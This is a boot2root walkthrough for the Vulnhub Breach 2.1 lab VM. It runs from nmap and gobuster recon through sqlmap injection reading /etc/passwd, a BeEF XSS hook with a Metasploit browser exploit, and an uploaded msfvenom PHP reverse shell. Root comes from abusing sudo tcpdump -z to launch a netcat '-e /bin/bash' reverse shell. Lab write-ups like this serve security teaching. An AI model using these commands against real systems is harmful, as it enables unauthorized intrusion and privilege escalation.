Vulnhub - Breach 2.1 boot2root CTF walkthrough



Breach 2.1 is meant to be beginner to intermediate boot2root/CTF challenge. The VM is configured with a static IP address ( so you will need to configure your host-only adaptor to this subnet.

Information Gathering

The VM is configured to the IP address Let’s start by scanning the target via nmap.

$ nmap -n -Pn -sS -p- -sV -iL scope -v --open --script "http-title or default" -oA target_$(date "+%Y-%m-%d")
# Nmap 7.40 scan initiated Wed Mar  8 16:26:50 2017 as: nmap -n -Pn -sS -p- -sV -iL scope -v --open --script http-title or default -oA target_2017-03-08
Nmap scan report for
Host is up (0.00011s latency).
Not shown: 65532 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          51603/udp  status
|_  100024  1          54935/tcp  status
54935/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey:
|   1024 f3:53:9a:0b:40:76:b1:02:87:3e:a5:7a:ae:85:9d:26 (DSA)
|   2048 9a:a8:db:78:4b:44:4f:fb:e5:83:6b:67:e3:ac:fb:f5 (RSA)
|_  256 c1:63:f1:dc:8f:24:81:82:35:fa:88:1a:b8:73:40:24 (ECDSA)

The one luring target is the ssh on port 65535/tcp. Let’s try and connect to it with ssh -p 65535.

The ssh banner of Breach 2.1.

So, that is a nice banner that encourages us to continue hacking. Also, the user peter does get a password hint in the banner. The obvious password would be in the source or maybe a variation. Let’s try these!

The hint actually provided the password.

The password actually is inthesource! Unfortunately, the ssh session is immediately closed by the server. The banner also mentions a blog that Peter is slacking on. Maybe we missed something, so better scan again and this time slowly. With ndiff we can compare the results.

-Not shown: 65532 closed ports
+Not shown: 65531 closed ports
+80/tcp open  http    Apache httpd 2.4.10 ((Debian))
+|  http-methods:
+|_   Supported Methods: GET HEAD POST OPTIONS
+|_ http-server-header: Apache/2.4.10 (Debian)
+|_ http-title: Initech Cyber Consulting, LLC

That is interesting, maybe the SSH login triggered the port to open? Let’s see for ourselves.

Looks like Milton left a comment.

The source code of the website might provide some additional pointers.

Nothing here.

Nothing here. Maybe we can find some files and directories on the web server via gobuster.

$ gobuster -u -w /usr/share/seclists/Discovery/Web_Content/raft-large-files.txt -e -r -l
===================================================== (Status: 200) [Size: 468] (Status: 200) [Size: 468]
$ gobuster -u -w /usr/share/seclists/Discovery/Web_Content/raft-large-directories.txt -e -r -l -f
===================================================== (Status: 200) [Size: 5600]

There is Peter’s blog! What might be hidden behind this URL.

Peter's Blog.

This is not wordpress, it is rather a random php blogging application. Intuition automatically spawns an sqlmap instance.

$ sqlmap --forms --batch --crawl 4 -u
sqlmap autospawns

Ohlala, sqlmap quickly found a UNION based sql injection. What a surprise. Also, doing a search on exploitdb might also provide some quick wins or additional information.

Known exploits for blogphp

There exist a few know exploits. The SQL injection is already documented. Cross-Site Scripting is not relevant, as this does not help in exploiting the server.

Let’s take a close look at the MySQL database. There is an os-commerce database in the mysql server.

oscommerce admin hash.

The admin password is only an md5 hashed password which can be quickly cracked. A search on the internet yields the cleartext password 32admin. Yet, on port 80 there is no os-commerce web shop. Let’s try to find out a little bit more about the system. First, let’s take a look at the user accounts of the system.

$ sqlmap --batch -u --file-read /etc/passwd

With the information from /etc/passwd other possible attack vectors are to perform a brute-force attack on the ssh service. Also, the table blogphp_stats seems to contain a log of the web application.

$ sqlmap -u -D blog -T blogphp_stats --count --dump --stop 99

The most intriguing part is, that another IP address is also browsing the blog regularly. This might be Peter slacking at work! This is probably a hint for a client side attack. Thinking back to the searchsploit results, a few XSS vulnerabilities have been documented for the blog.

Based on 17640.txt the XSS provided during the startup of BeEF can be utilized in the attack.

The payload is sent to the web application.

So when Peter is browsing his blog and visits the members page the BeEF hook will execute and establish a connection to the control panel. After a minute or two a browser connects.

Peter's browser is connected to the control panel.

Peter is using a pretty old version of Firefox. Searchsploit gives an overview and lists one metasploit module for this version of firefox.

The potential exploits for Peter's browser.

So, open up metasploit and start the matching browser exploit.

The exploit server is running and ready for target connections.

After starting the exploit server the client has to be redirected in order to exploit the browser. This can be achieved in multiple ways in BeEF.

Opening an iFrame with a link to the exploit server.

After a few seconds a shell connection is established.

The established session with user information.

Shell is good, meterpreter is better. With post/multi/manage/shell_to_meterpreter the session can be upgraded.

The meterpreter session is established.

Finally on the system. What next? Running post exploitation scripts to gather additional information might provide a next hint. Netstat list the localhost:2323 as open. Let’s find out what is waiting there for us.

The service responds with coordinates.

The service banner includes only a set of coordinates. A quick search on the internet provides a pin on the map.

The position on a map.

Houston it is. Trying some username and password combinations based on the user accounts on the box.

So, “Whose stapler is it?” is more like trick question. Looking back at Milton’s best scenes the answer is quite obvious.

After the login nothing happens. Let’s check the running services, maybe another one is activated after a successful login. After a quick nmap scan we can compare the results and check for changes., 08:00:27:B0:12:49:
-Not shown: 65531 closed ports
+Not shown: 65529 closed ports
+8888/tcp  open  http    nginx 1.6.2
+|  http-ls: Volume /
+|  SIZE  TIME               FILENAME
+|  -     15-Jun-2016 20:50  oscommerce/
+|  867   15-Jun-2016 18:09  index.nginx-debian.html
+|  http-methods:
+|_   Supported Methods: GET HEAD POST
+|_ http-server-header: nginx/1.6.2
+|_ http-title: Index of /

There is another web service available. This time even with oscommerce. The administrative interface for oscommerce is hosted at /admin. Luckily, the login credentials for the admin user have already been compromised via sqlmap. The hash corresponds to the password 32admin. However, this password did not work. However, trying the default combination admin:admin did grant access to the administrative interface.

With access to the file manager uploading a php shell would be possible. We have a winner. Just quickly create a meterpreter php payload that can be uploaded to the web server.

# msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=4444 -f raw -o meterpreter.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 949 bytes
Saved as: meterpreter.php

As none of the root folders is writeable there might be one in a subdirectory. With some command line kungfu a suitable directory can easily be found.

$ find /var/www/html2/oscommerce -perm /o=w

The web shell can be executed by simply browsing to the file.

The meterpreter payload is waiting to be executed.

After opening the payload in the browser the meterpreter connects back to the handler.

The reverse shell connects back to the handler.

Shells spawned from the meterpreter session are lacking the tty. A quick fix is to start one with the following python one liner.

python -c "import pty; pty.spawn('/bin/bash')"

Already having gathered relevant information about the system there might be some user specific security issue. Listing the sudo rights for the users brings one allowed command.

The sudo rights of blumbergh.

So the user blumbergh can execute tcpdump. Trying to get tcpdump running in order to capture some packets did not work. RTFM, there might be some feature that I missed up until now. The manpages do in fact list one option that could help in this precarious situation.

The manpage for tcpdump helped.

So, running tcpdump with this option will execute any command with root privileges. The easiest way is to utilize netcat on the target system, as it supports the execute function. Before starting the connection a listener has to be opened on the attcker machine.

$ echo "nc 1234 -e /bin/bash" > /tmp/
$ chmod +x /tmp/
$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/ -Z root

The script is executed and netcat connects to the attacking machine.

Root access to the system.

With root rights on the box let’s first start a fancy tty shell. The root user’s home directory has got a “hidden” file inside. Executing the python script outputs the credits for Breach 2.1. Win!

The flag.